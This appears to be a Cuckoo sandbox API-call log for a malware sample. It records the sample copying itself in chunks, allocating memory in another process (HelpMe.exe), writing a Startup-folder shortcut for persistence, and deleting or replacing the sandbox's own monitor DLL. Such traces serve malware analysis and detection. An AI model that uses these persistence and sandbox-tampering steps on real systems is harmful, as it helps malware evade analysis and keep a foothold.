"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->9614"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d6","hKey->0x00000062","lpSubKey->Network\SharingHandler"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d6","lpValueName->(null)"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->ChkAccDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->ProductType"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->0x000001c4","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Personal"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Local Settings"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->RsopDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->RsopLogging"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryW","SUCCESS","0x773d0000","lpFileName->comctl32.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryW","SUCCESS","0x76990000","lpFileName->ntshrui.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->12288"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->12288"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryA","SUCCESS","0x76980000","lpFileName->LINKINFO.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c4","lpValueName->ProductType"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->SrvsvcDefaultShareInfo"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->0x00000080"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","device","DeviceIoControl","SUCCESS","","hDevice->0x000001c4","dwIoControlCode->0x000900c0","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120ece4","nOutBufferSize->0x00000040","lpBytesReturned->0x0120ecdc","lpOverlapped->0x00000000"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup\Soft.lnk","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001de","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001de","lpValueName->DriveMask"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\dll\JTBmeJ.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\JTBmeJ.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->Start Menu"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->Start Menu","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu","cbData->96"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\dll\JTBmeJ.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
